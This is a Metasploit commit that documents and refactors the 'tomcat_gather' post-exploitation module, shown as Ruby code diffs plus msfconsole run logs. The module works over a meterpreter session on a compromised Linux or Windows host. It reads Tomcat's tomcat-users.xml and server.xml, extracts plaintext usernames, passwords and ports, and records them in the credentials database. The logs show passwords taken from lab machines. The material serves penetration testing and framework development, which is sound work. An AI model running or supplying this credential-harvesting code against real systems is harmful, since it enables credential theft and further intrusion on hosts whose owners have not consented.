Added documentation file and implemented fixes for output and linux parsing.

2017-03-31 11:19:12 +02:00 · 2017-03-31 11:19:12 +02:00 · df2a9a4af3
parent c8215e609a
commit df2a9a4af3
2 changed files with 157 additions and 56 deletions
--- a/modules/post/multi/gather/tomcat_gather.md
+++ b/modules/post/multi/gather/tomcat_gather.md
@ -0,0 +1,97 @@
+## Creating A Testing Environment
+  For this module to work you need a linux or windows machine.
+  For linux you can run something like apt-get install tomcat7 to get a working tomcat service.
+  For WIndows you can download tomcat from http://tomcat.apache.org/ and then install it as a service.
+
+This module has been tested against:
+
+  1. Xubuntu 16.04 with tomcat 7,8.
+  2. Windows 10 with tomcat 6,7.
+
+This module was not tested against, but may work against:
+
+  1. Other versions of linux running tomcat v4-9
+  2. Other version of windows running tomcat v4-9
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Obatin a meterpreter session via whatever method
+  3. Do: 'use post/multi/gather/tomcat_gather'
+  4. Do: 'set session #'
+  5. Do: 'run'
+
+## Scenarios
+
+### Xubuntu 16.04 with tomcat 7 and 8
+
+#### Running without read permissions
+
+    msf post(tomcat_gather) > set session 1
+    session => 1
+    msf post(tomcat_gather) > run
+
+    [*] [2017.03.31-10:19:27] Unix OS detected
+    [*] [2017.03.31-10:19:28] /etc/tomcat7/tomcat-users.xml found
+    [-] [2017.03.31-10:19:28] Failed to open file: /etc/tomcat7/tomcat-users.xml: core_channel_open: Operation failed: 1
+    [*] [2017.03.31-10:19:28] Cannot open /etc/tomcat7/tomcat-users.xml you probably don't have permission to open the file or parsing failed.
+    [*] [2017.03.31-10:19:28] /etc/tomcat8/tomcat-users.xml found
+    [-] [2017.03.31-10:19:28] Failed to open file: /etc/tomcat8/tomcat-users.xml: core_channel_open: Operation failed: 1
+    [*] [2017.03.31-10:19:28] Cannot open /etc/tomcat8/tomcat-users.xml you probably don't have permission to open the file or parsing failed.
+    [*] [2017.03.31-10:19:28] Attempting to extract Tomcat listening ports from /etc/tomcat7/server.xml
+    [-] [2017.03.31-10:19:28] Failed to open file: /etc/tomcat7/server.xml: core_channel_open: Operation failed: 1
+    [*] [2017.03.31-10:19:28] Cannot open /etc/tomcat7/server.xml you probably don't have permission to open the file or parsing failed
+    [*] [2017.03.31-10:19:28] Attempting to extract Tomcat listening ports from /etc/tomcat8/server.xml
+    [-] [2017.03.31-10:19:28] Failed to open file: /etc/tomcat8/server.xml: core_channel_open: Operation failed: 1
+    [*] [2017.03.31-10:19:28] Cannot open /etc/tomcat8/server.xml you probably don't have permission to open the file or parsing failed
+    [*] [2017.03.31-10:19:28] No user credentials have been found
+    [*] Post module execution completed
+
+#### Running with read permissions
+
+    msf post(tomcat_gather) > set session 2
+    session => 2
+    msf post(tomcat_gather) > run
+
+    [*] [2017.03.31-10:33:14] Unix OS detected
+    [*] [2017.03.31-10:33:15] /etc/tomcat7/tomcat-users.xml found
+    [*] [2017.03.31-10:33:15] /etc/tomcat8/tomcat-users.xml found
+    [*] [2017.03.31-10:33:15] Attempting to extract Tomcat listening ports from /etc/tomcat7/server.xml
+    [*] [2017.03.31-10:33:15] Attempting to extract Tomcat listening ports from /etc/tomcat8/server.xml
+    [+] [2017.03.31-10:33:16] Username and password found in /etc/tomcat7/tomcat-users.xml - tomcat2:s3cret
+    [+] [2017.03.31-10:33:16] Username and password found in /etc/tomcat8/tomcat-users.xml - tomcat2:s3cret
+    [*] Post module execution completed
+        
+    msf post(tomcat_gather) > creds
+    Credentials
+    ===========
+
+    host        origin      service            public   private  realm  private_type
+    ----        ------      -------            ------   -------  -----  ------------
+    10.10.10.6  10.10.10.6  8080/tcp (Tomcat)  tomcat2  s3cret          Password
+
+
+### Windows 10 with tomcat 7
+
+#### Running with read permissions
+
+    msf post(tomcat_gather) > run
+
+    [*] [2017.03.31-10:43:18] Windows OS detected, enumerating services
+    [+] [2017.03.31-10:43:18] Tomcat service found
+    [*] [2017.03.31-10:43:18] C:\Users\XXX\Desktop\apache-tomcat-7.0.75\conf\tomcat-users.xml found!
+    [+] [2017.03.31-10:43:19] Username and password found in C:\Users\XXX\Desktop\apache-tomcat-7.0.75\conf\tomcat-users.xml - tomcat:tomcat
+    [+] [2017.03.31-10:43:19] Username and password found in C:\Users\XXX\Desktop\apache-tomcat-7.0.75\conf\tomcat-users.xml - both:<must-be-changed>
+    [+] [2017.03.31-10:43:19] Username and password found in C:\Users\XXX\Desktop\apache-tomcat-7.0.75\conf\tomcat-users.xml - role1:<must-be-changed>
+    [*] Post module execution completed
+
+    msf post(tomcat_gather) > creds
+    Credentials
+    ===========
+
+    host        origin      service            public   private            realm  private_type
+    ----        ------      -------            ------   -------            -----  ------------
+    10.10.10.6  10.10.10.6  8080/tcp (Tomcat)  tomcat2  s3cret                    Password
+    10.10.10.7  10.10.10.7  8080/tcp (Tomcat)  tomcat   tomcat                    Password
+    10.10.10.7  10.10.10.7  8080/tcp (Tomcat)  both     <must-be-changed>         Password
+    10.10.10.7  10.10.10.7  8080/tcp (Tomcat)  role1    <must-be-changed>         Password
--- a/modules/post/multi/gather/tomcat_gather.rb
+++ b/modules/post/multi/gather/tomcat_gather.rb
@ -21,9 +21,10 @@ class MetasploitModule < Msf::Post
    ))
  end

-$username = Array.new
-$password = Array.new
-$port = Array.new
+  $username = []
+  $password = []
+  $port = []
+  $paths = []

  def report_creds(user, pass, port)
    return if (user.empty? or pass.empty?)
@ -42,7 +43,7 @@ $port = Array.new

      if not port.is_a? Integer
        port = 8080
-        print_status("Port not an Integer, defaulting to port " + port.to_s + " for creds database")
+        print_status("Port not an Integer, defaulting to port #{port} for creds database")
      end

      login_data = {
@ -54,16 +55,15 @@ $port = Array.new
            protocol: 'tcp',
            workspace_id: myworkspace_id
        }
-
        create_credential_login(login_data)
  end

-  def gatherwin()
-    print_status("Windows OS detected, enumerating services")
-    tomcatHomeArray = Array.new
+  def gatherwin
+    print_status('Windows OS detected, enumerating services')
+    tomcatHomeArray = []
    service_list.each do |service|
      if service[:name].downcase().include? "tomcat"
-        print_good("Tomcat service found")
+        print_good('Tomcat service found')
        tomcatHomeArray.push(service_info(service[:name])[:path].split("\\bin\\")[0])
      end
    end
@ -74,10 +74,10 @@ $port = Array.new
          tomcat_home = tomcat_home.split('"')[1]
        end

-        conf_path = tomcat_home + "\\conf\\tomcat-users.xml"
+        conf_path = "#{tomcat_home}\\conf\\tomcat-users.xml"

        if exist?(conf_path)
-          print_status(conf_path + "found!")
+          print_status("#{conf_path} found!")
          xml = read_file(conf_path).split("\n")

          comment_block = false
@ -85,6 +85,7 @@ $port = Array.new
            if line.include? "<user username=" and not comment_block
              $username.push(line.split('<user username="')[1].split('"')[0])
              $password.push(line.split('password="')[1].split('"')[0])
+              $paths.push(conf_path)
            elsif line.include? ("<!--")
              comment_block = true
            elsif line.include? ("-->") and comment_block
@ -93,7 +94,7 @@ $port = Array.new
          end
        end

-        port_path = tomcat_home + "\\conf\\server.xml"
+        port_path = "#{tomcat_home}\\conf\\server.xml"
        if exist?(port_path)
          xml = read_file(port_path).split("\n")
        end
@ -113,89 +114,92 @@ $port = Array.new
        end
      end
    else
-      print_status("No Tomcat home can be determined")
+      print_status('No Tomcat home can be determined')
    end
  end

-  def gathernix()
-    print_status("Unix OS detected")
+  def gathernix
+    print_status('Unix OS detected')
    user_files = cmd_exec('locate tomcat-users.xml').split("\n")
    if user_files.size > 0
      user_files.each do |path|
        if exist?(path)
-            print_status(path + " found")
-            begin
-              xml = read_file(path).split("\n")
-            rescue
-              print_status("Cannot open " + path + " you probably don't have permission to open the file.")
-              break
-            end
-
+          print_status("#{path} found")
+          begin
+            xml = read_file(path).split("\n")
            comment_block = false
            xml.each do |line|
              if line.include? "<user username=" and not comment_block
                $username.push(line.split('<user username="')[1].split('"')[0])
                $password.push(line.split('password="')[1].split('"')[0])
+                $paths.push(path)
              elsif line.include? ("<!--")
                comment_block = true
              elsif line.include? ("-->") and comment_block
                comment_block = false
              end
            end
+          rescue
+            print_status("Cannot open #{path} you probably don't have permission to open the file or parsing failed.")
          end
+        end
      end
    else
-      print_status("No tomcat installation has been detected")
+      print_status('No tomcat installation has been detected')
    end

    port_path = cmd_exec('locate server.xml').split("\n")
    if port_path.size > 0
      port_path.each do |path|
        if exist?(path) and path.include? "tomcat"
-          xml = read_file(path).split("\n")
-          comment_block = false
-          xml.each do |line|
-            if line.include? "<Connector" and not comment_block
-              i=0
-              while i < $username.count
-                $port.push(line.split('<Connector port="')[1].split('"')[0].to_i)
-                i+=1
+          print_status("Attempting to extract Tomcat listening ports from #{path}")
+          begin
+            xml = read_file(path).split("\n")
+            comment_block = false
+            xml.each do |line|
+              if line.include? "<Connector" and not comment_block
+                i=0
+                while i < $username.count
+                  $port.push(line.split('<Connector port="')[1].split('"')[0].to_i)
+                  i+=1
+                end
+              elsif line.include? ("<!--")
+                comment_block = true
+              elsif line.include? ("-->") and comment_block
+                comment_block = false
              end
-            elsif line.include? ("<!--")
-              comment_block = true
-            elsif line.include? ("-->") and comment_block
-              comment_block = false
            end
+          rescue
+            print_status("Cannot open #{path} you probably don't have permission to open the file or parsing failed.")
          end
        end
      end
    else
-      print_status("Failed to detect tomcat service port")
+      print_status('Failed to detect tomcat service port')
    end
  end

-  def run()
+  def run
    if sysinfo['OS'].include? "Windows"
-      gatherwin()
+      gatherwin
    else
-      gathernix()
+      gathernix
    end

-  if $username.size == 0
-    print_status("No user credentials have been found")
+    if $username.size == 0
+      print_status("No user credentials have been found")
+    end
+
+    i=0
+    while i < $username.count
+      print_good("Username and password found in #{$paths[i]} - #{$username[i]}:#{$password[i]}")
+      report_creds($username[i],$password[i],$port[i])
+      i+=1
+    end
+
+    $username = []
+    $password = []
+    $port = []
+    $paths = []
  end
-
-  i=0
-  while i < $username.count
-    print_good("Username and password found: " + $username[i] + ":" + $password[i])
-    report_creds($username[i],$password[i],$port[i])
-    i+=1
-  end
-
-  $username = Array.new
-  $password = Array.new
-  $port = Array.new
-
-  end
-
 end